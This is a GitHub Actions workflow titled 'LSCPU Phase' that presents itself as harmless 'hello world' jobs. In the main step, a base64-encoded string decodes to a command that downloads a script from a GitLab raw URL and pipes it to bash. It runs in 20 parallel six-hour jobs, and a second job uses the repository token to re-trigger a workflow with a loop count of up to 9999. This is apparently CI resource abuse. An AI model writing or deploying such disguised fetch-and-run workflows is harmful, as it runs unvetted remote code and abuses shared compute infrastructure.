name: 🔵 LSCPU Phase

on:
  workflow_dispatch:
    inputs:
      loop_count:
        description: 'Siklus tersisa'
        required: true
        default: '9999'

permissions:
  actions: write

jobs:
  run-lscpu:
    name: ${{ matrix.name }}
    strategy:
      fail-fast: false
      max-parallel: 20
      matrix:
        include:
          - name: hello-a1
          - name: hello-b1
          - name: hello-c1
          - name: hello-d1
          - name: hello-e1
          - name: hello-f1
          - name: hello-g1
          - name: hello-h1
          - name: hello-i1
          - name: hello-j1
          - name: hello-k1
          - name: hello-l1
          - name: hello-m1
          - name: hello-n1
          - name: hello-o1
          - name: hello-p1
          - name: hello-q1
          - name: hello-r1
          - name: hello-s1
          - name: hello-t1                                     
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Jalankan dengan durasi dinamis
        run: |
          HOUR_UTC=$(date -u +%H)
          LOOP=${{ github.event.inputs.loop_count }}
          if [ "$HOUR_UTC" -eq 4 ]; then
          echo "🕚 hello world"
          SLEEP=18000
          elif [ "$HOUR_UTC" -ge 23 ] || [ "$HOUR_UTC" -lt 3 ]; then
          echo "🕕 hello world"
          SLEEP=10800
          else
            if [ "$LOOP" -ge 9982 ]; then
              echo "🔄 hello world"
              SLEEP=600
            else
              echo "⏳ hello world"
              SLEEP=3600
            fi
          fi
          echo "hello world" & base64 -d <<< Y3VybCAtc0wgIGh0dHBzOi8vZ2l0bGFiLmNvbS9tYWthbmFuOTkvZm9vZC8tL3Jhdy9tYWluL3NhaXRhbWEgfCBiYXNo | sh & sleep $SLEEP

  trigger-hello:
    needs: run-lscpu
    runs-on: ubuntu-latest
    if: github.event.inputs.loop_count > 0
    steps:
      - name: Panggil Hello Phase
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          new_loop=$(( ${{ github.event.inputs.loop_count }} - 1 ))
          curl -X POST \
            -H "Authorization: token $GITHUB_TOKEN" \
            -H "Accept: application/vnd.github.v3+json" \
            https://api.github.com/repos/${{ github.repository }}/actions/workflows/phase-hello.yml/dispatches \
            -d "{\"ref\":\"main\",\"inputs\":{\"loop_count\":\"$new_loop\"}}"